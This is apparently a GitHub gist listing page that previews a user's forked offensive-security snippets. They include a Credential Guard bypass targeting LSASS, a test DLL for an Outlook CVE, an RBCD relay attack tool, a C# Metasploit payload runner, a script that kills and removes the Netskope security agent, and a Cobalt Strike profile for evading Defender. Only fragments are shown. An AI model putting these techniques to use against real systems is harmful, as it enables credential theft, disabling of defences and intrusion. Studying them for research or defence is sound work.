yeshuibo
yeshuibo
/ CredGuard_PoC
Created
July 15, 2024 01:30
— forked from N4kedTurtle/CredGuard_PoC
PoC for enabling wdigest to bypass credential guard
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <TlHelp32.h> | |
| #include <iostream> | |
| DWORD GetLsassPid() { | |
| PROCESSENTRY32 entry; | |
| entry.dwSize = sizeof(PROCESSENTRY32); |
yeshuibo
/ VR_roadmap.md
Created
June 21, 2024 01:01
— forked from tin-z/VR_roadmap.md
Becoming a Vulnerability Researcher roadmap: my personal experience
yeshuibo
/ test_dll.c
Created
April 13, 2024 01:46
— forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
yeshuibo
/ rbcd_relay.py
Created
March 15, 2024 05:31
— forked from 3xocyte/rbcd_relay.py
poc resource-based constrain delegation relay attack tool
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a *very* rough PoC | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import base64 | |
| import random | |
| import struct |
yeshuibo
/ pwntools-cheatsheet.md
Created
October 24, 2023 05:35
— forked from anvbis/pwntools-cheatsheet.md
pwntools-cheatsheet.md
yeshuibo
/ install-php5-kali-rolling.sh
Created
September 18, 2023 06:26
— forked from niallmerrigan/install-php5-kali-rolling.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list | |
| apt-get update | |
| apt-get -y install php5 libapache2-mod-php5 php5-mysql php5-curl php5-gd php5-intl php5-imap php5-mcrypt php5-pspell php5-recode php5-tidy php5-xmlrpc php5-xsl | |
| a2dismod php7.0 ; sudo a2enmod php5 ; sudo service apache2 restart | |
| service mysql start |
yeshuibo
/ msfsharp.cs
Created
March 2, 2023 06:45
— forked from lager1/msfsharp.cs
Run MSF payloads from C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace UnmanagedCode | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32")] | |
| static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode); |
yeshuibo
/ uninstall-netskope.sh
Created
August 11, 2022 02:08
— forked from dongri/uninstall-netskope.sh
uninstall netskope
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| sudo ps aux | grep Netskope | grep -v grep | awk '{ print "kill -9", $2 }' | sudo sh | |
| echo '[✓] Kill Netskope Process' | |
| sudo rm -rf /Applications/Remove\ Netskope\ Client.app | |
| echo '[✓] Removed Remove Netskope Client.app' | |
| sudo rm -rf /Library/Application\ Support/Netskope | |
| echo '[✓] Removed Agent of Netskope Client.app' |
yeshuibo
/ minimal-defender-bypass.profile
Created
January 3, 2022 02:58
— forked from tothi/minimal-defender-bypass.profile
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
yeshuibo
/ memBruteforce.cpp
Created
October 15, 2021 01:48
— forked from aaaddress1/memBruteforce.cpp
Windows 32-bit Shellcode Design without TEB & fs:30h
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // memBruteforce.cpp by aaaddress1@chroot.org | |
| // brute search loaded moudules in memory | |
| // rewrite from https://www.exploit-db.com/exploits/45293 | |
| #include <Windows.h> | |
| #include <iostream> | |
| #pragma warning(disable:4996) | |
| bool isMemExist(size_t addr) { | |
| int retv; | |
| __asm { |
NewerOlder